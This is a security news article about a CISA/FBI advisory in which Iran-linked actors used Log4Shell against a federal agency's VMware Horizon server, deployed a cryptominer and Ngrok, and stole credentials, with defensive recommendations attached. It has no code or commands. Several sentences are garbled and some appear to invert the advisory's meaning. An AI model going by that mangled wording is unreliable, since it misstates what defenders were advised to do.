Iran-Linked Threat Actors Compromise U.S. Federal Cybersecurity Matters

Iran-linked threat actors used the Log4Shell exploit to attack a federal civilian administration organization and install a crypto-mining malware.

An Iran-linked APT group exploited the Log4Shell vulnerability (CVE-2021-44228) to attack a Federal Civilian Executive Branch (FCEB) organization and deploy a cryptomining malware, according to a joint announcement from the FBI and CISA.

Log4Shell affects products from several major companies that use Log4j, but in many attacks the vulnerability has been exploited against affected VMware software.

In this specific case, Iranian hackers compromised an unpatched VMware Horizon server for remote code execution.

“CISA obtained four malicious documents for analysis during its involvement in an on-site incident response to a Federal Civilian Executive Branch (FCEB) organization compromised by an Iranian government-sponsored Advanced Persistent Threat (APT) actor.” Read the malicious release by CISA Software Analysis Report (AR22-320A). The files have been identified as variants of the XMRIG cryptocurrency mining software. These files include a kernel driver, two Windows executables, and a configuration file that controls one of the executable’s behaviors on the network and on the infected host. “

CISA conducted incident response engagements at affected Federal Civilian Executive Branch (FCEB) organizations from mid-June to mid-July 2022.

After installing the XMRig cryptominer, attackers moved laterally to reach domain controllers (DCs), compromise credentials, and then plant the Ngrok reverse proxy on multiple hosts for persistence in compromised networks, government experts found .

“CISA and FBI assess that FCEB network was compromised by Iranian state-sponsored APT actors.” Read the joint advisory. “CISA and the FBI are publishing this Cyber ​​Security Advisory (CSA) to provide Tactics, Techniques, and Procedures (TTPs) and Indicators of Compromise (IOCs) for suspected Iranian government-sponsored actors to help cyber defenders detect and prevent related compromises. “

CISA and the FBI encourage all organizations running vulnerable VMware servers to undertake the compromise and launch a threat hunting campaign.

Join the advisory urging organizations suspicious of initial access or compromise to undertake threat actor lateral movement, investigate connected systems (including DCs), and audit privileged accounts. The bulletin includes recommendations to prevent similar malicious cyber activity.

CISA and FBI recommend:

  • Install an updated version to ensure affected VMware Horizon and UAG systems are updated to the latest version.
  • Keep all software up to date And prioritizing patching of Known Exploited Vulnerabilities (KEVs).
  • Minimize the attack surface facing the Internet.
  • Best Practices for Using Identity and Access Management (IAM).
  • audit domain controller.
  • Create a deny list of known compromised credentials.
  • Protect credentials by limiting where accounts and credentials can be used.

In June, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber ​​Command (CGCYBER) issued a joint advisory warning of hackers attempting to exploit A Log4Shell vulnerability in VMware Horizon servers can compromise targeted networks.

“CISA and the U.S. Coast Guard Cyber ​​Command (CGCYBER) issued a joint cybersecurity advisory (CSA) to warn cyber defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, continue to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers gaining initial access to organizations that have not applied available patches.” Read the advisory.

The CVE-2021-44228 vulnerability made headlines in December after Chinese security researcher p0rz9 publicly disclosed a proof-of-concept vulnerability to a critical remote code execution zero-day vulnerability (aka Log4Shell) affecting the Apache Log4j Java-based logging library.

In one attack documented by government experts, the threat actor was able to move laterally inside the network and collect and exfiltrate sensitive data.

Follow me on Twitter: @securityaffairs and Facebook and mastodon

Pierluigi Paganini

(security affairs Hacking, Iran)

Leave a Reply

Your email address will not be published. Required fields are marked *